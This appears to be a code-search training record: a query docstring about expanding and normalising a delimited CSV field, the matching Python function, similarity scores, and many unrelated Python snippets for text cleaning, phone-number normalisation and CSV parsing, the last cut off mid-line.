self.POSITION\n pos = position_copy.content\n tmpN = \"\"\n tmpID = 0\n tmpOldID = pos[0].resID\n\n for p in pos:\n # print(p)\n # print(tmpN,tmpID)\n if p.resName == tmpN and p.resID == tmpOldID: # same residue as before\n p.resID = tmpID\n elif (\n p.resName == tmpN and p.resID != tmpOldID): # same resiname but diff ID (double? - this is a problem!)\n tmpOldID = p.resID\n tmpID += 1\n p.resID = tmpID\n else: # next name and residue id\n tmpID += 1\n tmpN = p.resName\n tmpOldID = p.resID\n p.resID = tmpID\n\n self.POSITION.content = pos", "def strip_other_charcter():\n pass", "def remove_digits(self, text):\n return re.sub('\\d+', '', text)", "def basic_cleaning2(string):\n\n string = string.lower()\n string = re.sub('[0-9\\(\\)\\!\\^\\%\\$\\'\\\"\\.;,-\\?\\{\\}\\[\\]\\\\/]', ' ', string)\n string = re.sub(' +', ' ', string)\n return string", "def strip_non_num(phone):\n return ''.join([i for i in phone if i.isdigit()])", "def compact(number):\n number = clean(number, ' ').upper().strip()\n for prefix in ('УНП', u'УНП', 'UNP', u'UNP'):\n if type(number) == type(prefix) and number.startswith(prefix):\n number = number[len(prefix):]\n # Replace Cyrillic letters with Latin letters\n cleaned = ''.join(_cyrillic_to_latin.get(x, x) for x in to_unicode(number))\n if type(cleaned) != type(number): # pragma: no cover (Python2 only)\n cleaned = cleaned.encode('utf-8')\n return cleaned", "def _remove_digits(text: str) -> str:\n table = str.maketrans('', '', digits)\n\n return text.translate(table)", "def normalize(sent):\n sent = re.sub(r'(?:@[\\w_]+)', \"user\", sent)\n sent = re.sub(r'http[s]?://(?:[a-z]|[0-9]|[$-_@.&amp;+]|[!*\\(\\),]|(?:%[0-9a-f][0-9a-f]))+', \"url\", sent)\n #sent = re.sub(r\"(?:\\#+[\\w_]+[\\w\\'_\\-]*[\\w_]+)\", \"hashtag\", sent)\n sent = ReplaceThreeOrMore(sent)\n sent = remove_unicode_diac(sent)\n sent = sent.replace('_', ' ')\n return sent", "def clean_data(td):\n data = td.string\n try:\n return data.strip(\" \\n:-\")\n except AttributeError:\n return u\"\"", "def clean_note_prefix(self):\n data = self.cleaned_data[\"note_prefix\"]\n return data.encode(\"ascii\") if data != \"\" else data", "def clean_values(values_to_clean: np.ndarray):\n char_rem = \"!@#$%^*()[]{};:.,/<>?|`~-=_+'\\\\\"\n for j in range(values_to_clean.shape[0]):\n for k in range(2, 4):\n for c in char_rem:\n values_to_clean[j, k] = re.sub(' +', ' ', values_to_clean[j, k].replace(c, \" \").strip())\n return values_to_clean", "def _strip_invalid_characters(self: object) -> None:\n for current_invalid_character in Episode._invalid_characters:\n self.episode_broadcast = self.episode_broadcast.replace(current_invalid_character, \" \").strip()\n self.episode_inspectors = self.episode_inspectors.replace(current_invalid_character, \" \").strip()\n self.episode_name = self.episode_name.replace(current_invalid_character, \" \").strip()\n self.episode_sequence = self.episode_sequence.replace(current_invalid_character, \"-\").strip()", "def remove_nums(self, text):\r\n return text.translate(None, digits)", "def remove_nums(self, text):\r\n return text.translate(None, digits)", "def remove_nums(self, text):\r\n return text.translate(None, digits)", "def _cleanupAddress(self, address):\n clean = []\n \n # This is sort of a desultory effort but I'm not convinced \n # that these cleanups will actually result in cleaner searches\n for word in address.split(None):\n lower = word.lower()\n \n # Some things we just nuke\n if lower == 'at': continue\n elif lower == 'btw': continue\n elif lower == 'btwn': continue\n elif word.isdigit(): continue\n \n # Or we make substitiutions\n elif lower == 'st' or lower == 'st.':\n word = 'Street'\n elif lower == 'ave' or lower == 'ave.':\n word = 'Avenue'\n elif lower == 'pl' or lower == 'pl.':\n word = 'Place'\n elif lower == 'n': word = 'North'\n elif lower == 'e': word = 'East'\n elif lower == 's': word = 'South'\n elif lower == 'w': word = 'West'\n \n clean.append(word)\n return ' '.join(clean)", "def _chop_end_misc(line):\n return re.sub(r\"\\s+\\d\\d-\\w\\w\\w-\\d\\d\\s+[1-9][0-9A-Z]{3}\\s*\\Z\", \"\", line)", "def dummy_junction34():\n return 'junction:chr1:351-399:+'", "def test_address__normalize_phone_number__5():\n assert '01234567891' == normalize_phone_number('01234/5678-91', '')", "def phoneNumberExtractor(self,data):\n\t\tdata = data.replace(\"\\r\", \" \")\n\t\tdata = data.replace(\"\\r\\n\", \" \")\n\n\t\t#first is identifying 10 digits code\n\t\tdata = data.split()\n\t\tresult = []\n\t\tfor word in data:\n\t\t\tres = None\n\t\t\tres = word if word.isdecimal() and len(word) == 10 and not res else res\n\t\t\tres = word[2:] if word.isdecimal() and len(word) == 12 and not res else res\n\t\t\tres = word[3:] if word[3:].isdecimal() and len(word) == 10 and not res else res\n\t\t\tif (\"(\" and \")\") in word or \"-\" in word:\n\t\t\t\tword = word.replace(\"(\",\"\")\n\t\t\t\tword = word.replace(\")\",\"\")\n\t\t\t\tword = word.replace (\"-\",\"\")\n\t\t\t\tres = word if(len(word) == 10) else None\n\t\t\tif res:\n\t\t\t\tresult.append(res)\n\t\t\t\tdel(res)\n\t\treturn set(result)", "def sanitize_key(key):\n return re.sub('\\W|^(?=\\d)','_', key)", "def test_address__normalize_phone_number__7():\n assert '+421234007891' == normalize_phone_number(\n '0042-1234/0078-91', '+49')" ]
[ "0.617545", "0.59764254", "0.5974559", "0.58157676", "0.57999325", "0.57070196", "0.56774664", "0.5623333", "0.56135535", "0.55448365", "0.5531851", "0.5499692", "0.54500884", "0.54454935", "0.5440887", "0.5432032", "0.54141355", "0.5411208", "0.54100305", "0.53966856", "0.53705513", "0.53509486", "0.5347722", "0.5342722", "0.53245085", "0.5305887", "0.53037786", "0.5303514", "0.5302226", "0.52968335", "0.52929324", "0.5289402", "0.52836335", "0.5244402", "0.5244222", "0.5227969", "0.5219317", "0.5216829", "0.5206958", "0.5201648", "0.5191715", "0.51908326", "0.5181376", "0.51750755", "0.51729584", "0.5169187", "0.51578754", "0.5156093", "0.5154104", "0.5148885", "0.514559", "0.51372844", "0.51358384", "0.5125866", "0.5098999", "0.5098197", "0.50847644", "0.5076807", "0.5073669", "0.5073669", "0.5068347", "0.5065133", "0.50516987", "0.50493765", "0.50389045", "0.5035547", "0.5026138", "0.5025726", "0.501843", "0.5018155", "0.50097835", "0.5005653", "0.49896538", "0.49864098", "0.49838752", "0.49813983", "0.49725696", "0.49712414", "0.49640462", "0.496314", "0.49598193", "0.49576965", "0.495636", "0.49543518", "0.49513298", "0.4950538", "0.49434543", "0.4940075", "0.49386284", "0.4933374", "0.49313065", "0.49313065", "0.49313065", "0.49298126", "0.4927804", "0.4926903", "0.4925628", "0.49064586", "0.49060035", "0.49057376" ]
0.5550276
9
take a field from the csv and expand/split on a delimiter and return a list of individual values. If the return_list flag is set to true, then this method will return the data back as a list of new fields instead of a cleaned up string and normalized with semicolon delimiter
def expand_and_normalize_field(field, return_list=False): if isinstance(field, basestring): field = field.rstrip(';:,') data = [_normalize_expanded_field(r) for r in re.split(",|;|:", field)] if return_list: return data else: return ";".join(data) else: if return_list: return [field] else: return field
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def csv_line(value_parser):\n def convert(string):\n return list(map(value_parser, string.split(',')))\n return convert", "def parse_and_flatten(df, field_name):\n\n # Parse and flatten the list\n lst = list(df[field_name])\n lst = [x.split('|') for x in lst]\n\n lst_flat = []\n for slist in lst:\n for x in slist:\n lst_flat.append(x)\n return lst_flat", "def from_csv_line(line):\r\n return line.strip().split(',')", "def parse_csv_option(option):\n if option:\n return option.split(',')\n else:\n return []", "def parse_csv_option(option):\n if option:\n return option.split(',')\n else:\n return []", "def _parsecsv(x):\n for line in x:\n # decode as utf-8, whitespace-strip and split on delimiter\n yield line.decode('utf-8').strip().split(config.DELIMITER)", "def map_field_value(\n row: DLCSRecord, field_name: str, config: typing.Dict\n) -> typing.Any:\n mapping: mapper.MappigDictValue = mapper.FIELD_MAPPING[field_name]\n\n if mapping is None:\n return None\n\n if callable(mapping):\n return mapping(row)\n\n if isinstance(mapping, str):\n mapping = [mapping]\n\n if not isinstance(mapping, typing.Collection):\n raise TypeError(\n f\"FIELD_MAPPING[field_name] must be iterable, unless it is None, Callable, or a string.\"\n )\n\n output: typing.List[str] = []\n for csv_field in mapping:\n input_value = row.get(csv_field)\n if input_value:\n if isinstance(input_value, str):\n output.extend(input_value.split(\"|~|\"))\n else:\n output.append(input_value)\n\n bare_field_name = get_bare_field_name(field_name)\n if bare_field_name in config.get(\"controlled_fields\", {}):\n terms = config[\"controlled_fields\"][bare_field_name][\"terms\"]\n output = [terms.get(value, value) for value in output]\n\n return [value for value in output if value] # remove untruthy values like ''", "def parse_csv2list_upload(file_name):\n with open(file_name) as f:\n records = csv.reader(f)\n csv_list = [[j.strip() for j in record] for record in records]\n return csv_list", "def __obtain_data_from_csv__(self, csvfile):\n data = csvfile.readlines()\n data = self.__parse_string_for_delimiter__(data)\n return data", "def __parse_string_for_delimiter__(self, data):\n parsed = []\n for row in data:\n row = self.__remove_break_line__(row)\n row = self.__split_for_delimiter__(row)\n parsed.append(row)\n return parsed", "def csv_reader(self, file_obj):\n reader = csv.reader(file_obj)\n for row in reader:\n row_1 = (' '.join(row))\n self.data.append(row_1.split(';'))\n return self.data", "def _read_delimited_field(d):\n val = []\n val.append(next(d))\n while val[-1] != FIELD_DELIMITER:\n try:\n val.append(next(d))\n except StopIteration: break\n\n modlogger.debug( \"read:%s\"%val[:-1])\n return field_ctor(val[:-1])", "def getcsv(self, section, option):\n elements = self.get(section, option)\n splitter = ',' if ',' in elements else None\n return [element.strip() for element in elements.split(splitter)]", "def listparse(csvfilename):\r\n output = []\r\n with open(csvfilename, 'r', newline = '') as csvfile:\r\n csvreader = csv.reader(csvfile, skipinitialspace = True)\r\n for row in csvreader:\r\n output.append(row)\r\n return output", "def process_data(line):\n wire_path_data = []\n for i in line:\n wire_path_data.append(i.strip('\\n').split(','))\n return wire_path_data", "def aslist(value, flatten=True):\n values = aslist_cronly(value)\n if not flatten:\n return values\n result = []\n for value in values:\n subvalues = value.split()\n result.extend(subvalues)\n return result", "def _splitFieldValue(self, line):\n found = self.FIELDVALUE.findall(line)\n if found:\n fieldName, value = found[0]\n if fieldName in self.C.ADAPTER_COMMAFIELDS:\n value = self.COMMASPLIT.findall(value)[:-1] # Split and remove last empty part\n return fieldName, value\n return None, None # No field name match on this line.", "def list_process(field, item_list:List[str]):\n # if isinstance(item_list, list):\n if len(item_list) == 0:\n return {\n\n }\n saved_list = []\n\n for i in item_list:\n saved_list.append(f\"{i}\")\n return {\n field: \",\".join(saved_list)\n }", "def line_to_list(self, _line):\n\n\t\tresult = list()\t\t\n\t\t_line_splited = _line.split('\\t')\n\t\t\n\t\tfor value in _line_splited:\n\t\t\tvalue_stripped = value.strip().rstrip()\t\t\t\n\t\t\tresult.append(value_stripped)\t\t\t\t\n\t\t\n\t\treturn result", "def __parseCsvRow(row):\r\n \r\n resultRow = []\r\n for item in row:\r\n if type(item) is str:\r\n if \".\" in item:\r\n try:\r\n f = float(item)\r\n resultRow.append(f)\r\n except ValueError:\r\n resultRow.append(item)\r\n else:\r\n try:\r\n i = int(item)\r\n resultRow.append(i)\r\n except ValueError:\r\n resultRow.append(item)\r\n else:\r\n resultRow.append(item)\r\n return resultRow", "def _parse_list(string, dtype=int, delimiter=','):\n\n items = string.lower().strip().replace(' ', '').split(delimiter)\n\n if 'none' in items:\n items.pop(items.index('none'))\n contains_none = True\n else:\n contains_none = False\n\n\n if dtype == bool:\n items = [item == 'true' for item in items]\n else:\n items = [dtype(item) for item in items]\n\n if contains_none:\n items.append(None)\n\n return items", "def lineToList(self, line):\n l = [item for item in next(csv.reader(StringIO.StringIO(line), self.CSVDialect))]\n if self.firstLine is None:\n self.firstLine = l\n return None\n return l", "def csv_to_field_Urls(entity, value):\n if value is None or value == '':\n return\n splitter = re.compile(url_splitter)\n entity.string = splitter.split(value)", "def getlist(self, option, sep=',', chars=None):\n return [chunk.strip(chars) for chunk in option.split(sep)]", "def split_field_content(cls, string):\n if \",\" in string and not is_rfc1123_datetime(string):\n return [s.strip() for s in string.split(\",\")]\n else:\n return string", "def transform(self):\n with open(self.csv_path, \"r\") as f:\n csv_entries = [{k: v for k, v in row.items()} for row in csv.DictReader(f, skipinitialspace=True)]\n\n nested_fields = get_nested_fieldnames(csv_entries[0])\n # values of these fields should be transformed to a list\n # list_fields = set()\n # for entry in csv_entries:\n # for k, v in entry.items():\n # if '||' in v:\n # list_fields.add(k)\n list_fields = {\n \"BITSTREAM Download URL\",\n \"BITSTREAM License\",\n \"BITSTREAM Webshop URL\",\n \"dc.contributor\",\n \"dc.contributor.author\",\n \"dc.contributor.editor\",\n \"dc.date.available\",\n \"dc.date.accessioned\",\n \"dc.date.issued\",\n \"dc.date.submitted\",\n \"dc.dateSubmitted\",\n \"dc.description.abstract\",\n \"dc.description.provenance\",\n \"dc.grantproject\",\n \"dc.identifier\",\n \"dc.identifier.pr\",\n \"dc.language\",\n \"dc.notes\",\n \"dc.number\",\n \"dc.redirect\",\n \"dc.relation.ispartofseries\",\n \"dc.relationisFundedBy\",\n \"dc.subject\",\n \"dc.subject.classification\",\n \"dc.subject.other\",\n \"dc.title\",\n \"dc.title.alternative\",\n \"dc.type\",\n \"oapen.collection\",\n \"oapen.grant.number\",\n \"oapen.grant.program\",\n \"oapen.imprint\",\n \"oapen.relation.hasChapter\",\n \"oapen.relation.hasChapter_dc.title\",\n \"oapen.relation.isFundedBy\",\n \"oapen.relation.isFundedBy_grantor.name\",\n \"oapen.relation.isPartOfBook\",\n \"oapen.relation.isPartOfBook_dc.title\",\n \"oapen.relation.isPublishedBy_publisher.name\",\n \"oapen.relation.isPublisherOf\",\n \"oapen.relation.isbn\",\n \"oapen.remark.public\",\n \"peerreview.anonymity\",\n \"peerreview.id\",\n \"peerreview.open.review\",\n \"peerreview.publish.responsibility\",\n \"peerreview.review.decision\",\n \"peerreview.review.stage\",\n \"peerreview.review.type\",\n \"peerreview.reviewer.type\",\n }\n # add custom 'dc.subject.classification_code'\n list_fields.add(\"dc.subject.classification_code\")\n entries = transform_dict(csv_entries, convert, nested_fields, list_fields)\n\n # Transform release into JSON Lines format saving in memory buffer\n # Save in memory buffer to gzipped file\n list_to_jsonl_gz(self.transform_path, entries)", "def extractFields(deerfootRDDRecord):\n fieldsList = deerfootRDDRecord.split(\",\")\n return (fieldsList[0], [fieldsList[1], fieldsList[15], fieldsList[46]])", "def get_list(section, option, default):\n\tres = get(section, option, default)\n\n\tif res == default:\n\t\treturn default\n\n\tl = unescape_split(\",\", res)\n\n\tif not l:\n\t\treturn default\n\treturn list(l)", "def line_split(self, line):\n\t\tline = re.sub(r\"`(.*?)'\", quote_replace, line)\n\t\tline = line.translate(None, '.:,()+*')\n\t\treturn line.split()", "def listify(item, delimiter=\",\"):\n if not item:\n return []\n if type(item) is str:\n item = item.split(delimiter)\n if type(item) is not list:\n raise TypeError(\"'listify' must take None, str, or list!\")\n return item", "def csv_to_list(csv_file, delimiter=','):\n with open(csv_file, 'r') as csv_con:\n reader = csv.reader(csv_con, delimiter=delimiter)\n return list(reader)", "def __obtain_csv_fieldnames__(self, csvfile):\n self.__fieldnames__ = csvfile.readline()\n self.__obtain_csv_delimiter__(self.__fieldnames__)\n self.__fieldnames__ = self.__remove_break_line__(self.__fieldnames__)\n self.__fieldnames__ = self.__split_for_delimiter__(self.__fieldnames__)", "def _build_data_from_text(self, text):\n # get CSV field\n text = text.split(self._data_sep)[self._data_col]\n # tokenize\n return super()._build_data_from_text(text)", "def mapper_data_cleaning(self, l, line):\n lineitems = line.split(\",\")\n yield (lineitems[0], lineitems[2])", "def split_values(self, value):\n if value:\n return [s.strip() for s in value.split(',')]\n else:\n return []", "def csv_reader(filepath):\n with open(filepath) as f: \n for row in f: \n row = row.strip()\n r = list()\n part = '' \n is_double_quoted = False\n\n for c in row: \n if c == ',': \n if is_double_quoted is False:\n r.append(part)\n part = ''\n else: \n part += c\n elif c == '\\\"': \n is_double_quoted = not is_double_quoted\n else: \n part += c\n if part != '': \n r.append(part)\n\n yield r", "def process_line(line):\n\n name_comp_list = []\n givenname_comp_list = []\n surname_comp_list = []\n geocode_comp_list = []\n locality_comp_list = []\n date1_comp_list = []\n date2_comp_list = []\n\n # Split the line into the basic fields - - - - - - - - - - - - - - - - - - -\n #\n if (config.in_file_type in ['CSV','CSVQ','TAB','TABQ']):\n # Comma or tabulator separated\n try:\n line_list = config.line_parser.parse(line)\n except:\n log_message('CSV line parsing failed with inout: '+line,'err')\n\n if (len(line_list) < config.input_len):\n log_message('Input line does not contain enough fields,' +\\\n 'fill up with empty fields','warn')\n while (len(line_list) < config.input_len):\n line_list.append('')\n\n config.curr_line_list = line_list # Save current line list\n\n # Extract fields into different component lists - - - - - - - - - - - - - -\n #\n if (config.input_component['name'] != []): # Extract name fields\n for i in config.input_component['name']:\n name_comp_list.append(line_list[i])\n\n else: # Extract givenname and surname into separate components - - - - - -\n if (config.input_component['givenname'] != []): # Extract g-name fields\n for i in config.input_component['givenname']:\n givenname_comp_list.append(line_list[i])\n\n if (config.input_component['surname'] != []): # Extract surname fields\n for i in config.input_component['surname']:\n surname_comp_list.append(line_list[i])\n\n if (config.input_component['geocode'] != []): # Extract geocode fields\n for i in config.input_component['geocode']:\n geocode_comp_list.append(line_list[i])\n\n if (config.input_component['locality'] != []): # Extract locality fields\n for i in config.input_component['locality']:\n locality_comp_list.append(line_list[i])\n\n if (config.input_component['date1'] != []): # Extract date1 fields\n for i in config.input_component['date1']:\n date1_comp_list.append(line_list[i])\n\n if (config.input_component['date2'] != []): # Extract date2 fields\n for i in config.input_component['date2']:\n date2_comp_list.append(line_list[i])\n\n elif (config.in_file_type == 'COL'): # Column based input file - - - - - - -\n\n if (len(line) < config.input_len):\n log_message('Input line is not long enough, fill up with spaces','warn')\n line += ' '*(config.input_len-len(line))\n\n if (config.input_component['name'] != []): # Extract name fields\n for (col_start,length) in config.input_component['name']:\n name_comp_list.append(line[col_start,col_start+length])\n\n else: # Extract givenname and surname into separate components - - - - - -\n if (config.input_component['givenname'] != []): # Extract g-name fields\n for (col_start,length) in config.input_component['givenname']:\n givenname_comp_list.append(line[col_start,col_start+length])\n\n if (config.input_component['surname'] != []): # Extract surname fields\n for (col_start,length) in config.input_component['surname']:\n surname_comp_list.append(line[col_start,col_start+length])\n\n if (config.input_component['geocode'] != []): # Extract geocode fields\n for (col_start,length) in config.input_component['geocode']:\n geocode_comp_list.append(line[col_start,col_start+length])\n\n if (config.input_component['locality'] != []): # Extract locality fields\n for (col_start,length) in config.input_component['locality']:\n locality_comp_list.append(line[col_start,col_start+length])\n\n if (config.input_component['date1'] != []): # Extract date1 fields\n for (col_start,length) in config.input_component['date1']:\n date1_comp_list.append(line[col_start,col_start+length])\n\n if (config.input_component['date2'] != []): # Extract date2 fields\n for (col_start,length) in config.input_component['date2']:\n date2_comp_list.append(line[col_start,col_start+length])\n\n # elif (config.in_file_type == 'SQL'): # - - - - - - - - - - - - - - - - - -\n\n ################################\n # Add later: SQL database access\n ################################\n\n msg = [' Component basic field lists:', \\\n ' Name: '+str(name_comp_list), \\\n ' Given name: '+str(givenname_comp_list), \\\n ' Surname: '+str(surname_comp_list), \\\n ' Geocode: '+str(geocode_comp_list), \\\n ' Locality: '+str(locality_comp_list), \\\n ' Date1: '+str(date1_comp_list), \\\n ' Date2: '+str(date2_comp_list)]\n log_message(msg,'v2')\n\n name_comp = ''\n givenname_comp = ''\n surname_comp = ''\n geocode_comp = ''\n locality_comp = ''\n date1_comp = ''\n date2_comp = ''\n\n # Now clean and then concatenate component lists into strings - - - - - - - -\n #\n if (name_comp_list != []): # Name component\n name_comp = name_comp_list[0] # Start with first field in list\n\n for f in name_comp_list[1:]: # Loop over following fields (if any)\n if (f != ''):\n if (config.input_space_sep['name'] == 1):\n sep = ' ' # Set separator to space between fields\n else:\n sep = '' # No space between fields\n\n # Check field spilling only if space separator is set to ' ' \n #\n if (sep == ' ') and (config.input_check_spilling['name'] == 1):\n sep = check_field_spill(name_comp, f)\n\n name_comp = name_comp+sep+f # Append separator and field\n\n if (givenname_comp_list != []): # Givenname component - - - - - - - - - - -\n givenname_comp = givenname_comp_list[0] # Start with first field in list\n\n for f in givenname_comp_list[1:]: # Loop over following fields (if any)\n if (f != ''):\n if (config.input_space_sep['givenname'] == 1):\n sep = ' ' # Set separator to space between fields\n else:\n sep = '' # No space between fields\n\n # Check field spilling only if space separator is set to ' ' \n #\n if (sep == ' ') and (config.input_check_spilling['givenname'] == 1):\n sep = check_field_spill(givenname_comp, f)\n\n givenname_comp = givenname_comp+sep+f # Append separator and field\n\n if (surname_comp_list != []): # Surname component - - - - - - - - - - - - -\n surname_comp = surname_comp_list[0] # Start with first field in list\n\n for f in surname_comp_list[1:]: # Loop over following fields (if any)\n if (f != ''):\n if (config.input_space_sep['surname'] == 1):\n sep = ' ' # Set separator to space between fields\n else:\n sep = '' # No space between fields\n\n # Check field spilling only if space separator is set to ' ' \n #\n if (sep == ' ') and (config.input_check_spilling['surname'] == 1):\n sep = check_field_spill(surname_comp, f)\n\n surname_comp = surname_comp+sep+f # Append separator and field\n\n if (geocode_comp_list != []): # Geocode component - - - - - - - - - - - - -\n geocode_comp = geocode_comp_list[0] # Start with first field in list\n\n for f in geocode_comp_list[1:]: # Loop over following fields (if any)\n if (f != ''):\n if (config.input_space_sep['geocode'] == 1):\n sep = ' ' # Set separator to space between fields\n else:\n sep = '' # No space between fields\n\n # Check field spilling only if space separator is set to ' ' \n #\n if (sep == ' ') and (config.input_check_spilling['geocode'] == 1):\n sep = check_field_spill(geocode_comp, f)\n\n geocode_comp = geocode_comp+sep+f # Append separator and field\n\n if (locality_comp_list != []): # Locality component - - - - - - - - - - - -\n locality_comp = locality_comp_list[0] # Start with first field in list\n\n for f in locality_comp_list[1:]: # Loop over following fields (if any)\n if (f != ''):\n if (config.input_space_sep['locality'] == 1):\n sep = ' ' # Set separator to space between fields\n else:\n sep = '' # No space between fields\n\n # Check field spilling only if space separator is set to ' ' \n #\n if (sep == ' ') and (config.input_check_spilling['locality'] == 1):\n sep = check_field_spill(locality_comp, f)\n\n locality_comp = locality_comp+sep+f # Append separator and field\n\n if (date1_comp_list != []): # Date1 component - - - - - - - - - - - - - - -\n date1_comp = date1_comp_list[0] # Start with first field in list\n\n for f in date1_comp_list[1:]: # Loop over following fields (if any)\n if (f != ''):\n if (config.input_space_sep['date1'] == 1):\n sep = ' ' # Set separator to space between fields\n else:\n sep = '' # No space between fields\n\n # Check field spilling only if space separator is set to ' ' \n #\n if (sep == ' ') and (config.input_check_spilling['date1'] == 1):\n if (date1_comp[-1] != ' ') and (f[0] != ' '):\n tmp_list0 = date1_comp.split()\n tmp_list1 = f.split()\n check_word = tmp_list0[-1]+tmp_list1[0]\n\n if (check_word in ['jan','feb','mar','apr','may','jun','jul','aug', \\\n 'sep','oct','nov','dec','january','february','march','april', \\\n 'may','june','july','august','september','october','november', \\\n 'december']):\n\n sep = '' # Set separator to no space\n msg = ' Correct date1 word spilling: \"'+date1_comp+'\",\"'+f+'\"'\n log_message(msg,'v1')\n\n date1_comp = date1_comp+sep+f # Append separator and field\n\n if (date2_comp_list != []): # Date2 component - - - - - - - - - - - - - - -\n date2_comp = date2_comp_list[0] # Start with first field in list\n\n for f in date2_comp_list[1:]: # Loop over following fields (if any)\n if (f != ''):\n if (config.input_space_sep['date2'] == 1):\n sep = ' ' # Set separator to space between fields\n else:\n sep = '' # No space between fields\n\n # Check field spilling only if space separator is set to ' ' \n #\n if (sep == ' ') and (config.input_check_spilling['date2'] == 1):\n if (date2_comp[-1] != ' ') and (f[0] != ' '):\n tmp_list0 = date1_comp.split()\n tmp_list1 = f.split()\n check_word = tmp_list0[-1]+tmp_list1[0]\n\n if (check_word in ['jan','feb','mar','apr','may','jun','jul','aug', \\\n 'sep','oct','nov','dec','january','february','march','april', \\\n 'may','june','july','august','september','october','november', \\\n 'december']):\n\n sep = '' # Set separator to no space\n msg = ' Correct date1 word spilling: \"'+date1_comp+'\",\"'+f+'\"'\n log_message(msg,'v1')\n\n date2_comp = date2_comp+sep+f # Append separator and field\n\n # Check if name component is given or givenname and surname separately - - -\n #\n if (config.input_component['givenname'] != []) or \\\n (config.input_component['surname'] != []):\n name_comp = [givenname_comp, surname_comp]\n\n msg = [' Components:', \\\n ' Name: \"'+str(name_comp)+'\"', \\\n ' Geocode: \"'+geocode_comp+'\"', \\\n ' Locality: \"'+locality_comp+'\"', \\\n ' Date1: \"'+date1_comp+'\"', \\\n ' Date2: \"'+date2_comp+'\"']\n log_message(msg,'v1')\n\n return [name_comp, geocode_comp, locality_comp, date1_comp, date2_comp]", "def read_csv_to_list(in_file, headless=True, delim='\\t'):\n ret_list=list()\n with open(in_file,'r') as csv_file:\n my_reader = csv.reader(csv_file, delimiter=delim) \n if headless:\n next(my_reader)\n for row in my_reader:\n ret_list.append(list(row))\n return(ret_list)", "def args_to_list(csv, allow_empty, arg_type=int, allow_negative=True):\n arg_vals = [arg_type(d) for d in str(csv).split(',')]\n if not allow_negative:\n arg_vals = [v for v in arg_vals if v >= 0]\n if not allow_empty and len(arg_vals) == 0:\n return None\n return arg_vals", "def values_list(self, *fields, **kwargs):\r\n flat = kwargs.pop('flat', False)\r\n if kwargs:\r\n raise TypeError('Unexpected keyword arguments to values_list: %s'\r\n % (kwargs.keys(),))\r\n if flat and len(fields) > 1:\r\n raise TypeError(\"'flat' is not valid when values_list is called with more than one field.\")\r\n clone = self.only(fields)\r\n clone._values_list = True\r\n clone._flat_values_list = flat\r\n return clone", "def _read_csv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\n return list(csv.reader(f, delimiter=\",\", quotechar=quotechar))", "def _read_csv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\n return list(csv.reader(f, delimiter=\",\", quotechar=quotechar))", "def split_line(line: str) -> [str]:\n return line.strip().split(',')", "def to_python(self, value):\n # Return an empty list if no input was given.\n if not value:\n return []\n return value.split(',')", "def fileFiltSelFieldsRecGen(filePath, filt, columns, delim = \",\"):\n\tcolumns = strToIntArray(columns, delim)\n\twith open(filePath, \"r\") as fp:\n\t\tfor line in fp:\t\n\t\t\tline = line[:-1]\n\t\t\tif delim is not None:\n\t\t\t\tline = line.split(delim)\n\t\t\tif filt(line):\n\t\t\t\tselected = extractList(line, columns)\n\t\t\t\tyield selected", "def read(self, line):\n data = []\n if six.PY3 and type(line) == six.binary_type:\n line = line.decode('utf-8')\n\n csv_reader = csv.reader(six.StringIO(line),\n delimiter=self.delimiter,\n quotechar=self.quotechar,\n skipinitialspace=True)\n for cr in csv_reader:\n data = [decode_string(f).strip() for f in cr]\n break\n\n return None, data", "def get_column_value_list(\n filenames: List[str],\n column_name: str,\n debug: Optional[bool] = False\n) -> List[Any]:\n result = []\n for file_name in filenames:\n\n # Open the file for reading\n file_in = codecs.open(file_name, 'rU')\n dialect = csv.Sniffer().sniff(file_in.read(1024))\n file_in.seek(0)\n data_in = csv.reader(file_in, dialect=dialect, delimiter=str(','))\n\n if debug:\n print('Parsing file ' + file_name)\n\n line_number = 0\n header_detected = False\n col_idx = -1\n for data in data_in:\n # Count the line number to flag anomalies\n line_number += 1\n\n # If mark has not been detected yet\n if not header_detected:\n if column_name not in data:\n # Line does not match, skip it\n continue\n\n # At this point the column has been detected\n header_detected = True\n\n # Get index of the column\n col_idx = data.index(column_name)\n\n # Proceed with the following lines\n continue\n\n # Safety check. If something went wrong when the CSV file was\n # exported, it is very likely that the string #REF! is present. If\n # so, notify and stop.\n if '#REF!' in data or '#VALUE' in data:\n print('Line', line_number, 'contains incorrect data',\n file=sys.stderr)\n sys.exit(1)\n\n # At this point we are processing a data line\n\n # If the number of fields doesn't match number of columns, flag!\n if col_idx >= len(data):\n print('Mismatched line', line_number, 'skipping',\n file=sys.stderr)\n continue\n\n # append the string\n result.append(data[col_idx])\n\n return result", "def extract_cfda(field, type):\n extracted_values = []\n if field:\n entries = [entry.strip() for entry in field.split(';')]\n if type == 'numbers':\n extracted_values = [entry[:entry.index(' ')] for entry in entries]\n else:\n extracted_values = [entry[entry.index(' ')+1:] for entry in entries]\n return ', '.join(extracted_values)", "def csv_to_field_CampaignLanguages(entity, value):\n if value is None or value == '':\n return\n splitter = re.compile(r';')\n entity.string = splitter.split(value)", "def parse_ftp_list_line(ftp_list_line):\n return FTPListDataParser().parse_line(ftp_list_line)", "def feed(self, inline, endchar=None):\n # preserve the original line\n # for error messages\n if endchar is None:\n self.origline = inline\n inline = inline.lstrip()\n #\n outlist = []\n comma_needed = False\n found_comma = False\n while inline:\n # NOTE: this sort of operation would be quicker\n # with lists - but then can't use regexes\n thischar = inline[0]\n if thischar == '#':\n # reached a comment\n # end of the line...\n break\n #\n if thischar == endchar:\n return outlist, inline[1:]\n #\n if comma_needed:\n if thischar == ',':\n inline = inline[1:].lstrip()\n comma_needed = False\n found_comma = True\n continue\n raise BadLineError('Line is badly built :\\n%s' % self.origline)\n #\n try:\n # the character that marks the end of the list\n listend = self.liststart[thischar]\n except KeyError:\n pass\n else:\n if not self.recursive and endchar is not None:\n raise BadLineError('Line is badly built :\\n%s' % self.origline)\n newlist, inline = self.feed(inline[1:], endchar=listend)\n outlist.append(newlist)\n inline = inline.lstrip()\n comma_needed = True\n continue\n #\n if thischar in self.quotes:\n # this might raise an error\n # FIXME: trap the error and raise a more appropriate one ?\n element, inline = unquote(inline, fullquote=False, \n retain=self.retain)\n inline = inline.lstrip()\n outlist.append(element)\n comma_needed = True\n continue\n #\n # must be an unquoted element\n mat = unquoted.match(inline)\n if mat is not None:\n # FIXME: if the regex was better we wouldn't need an rstrip\n element = 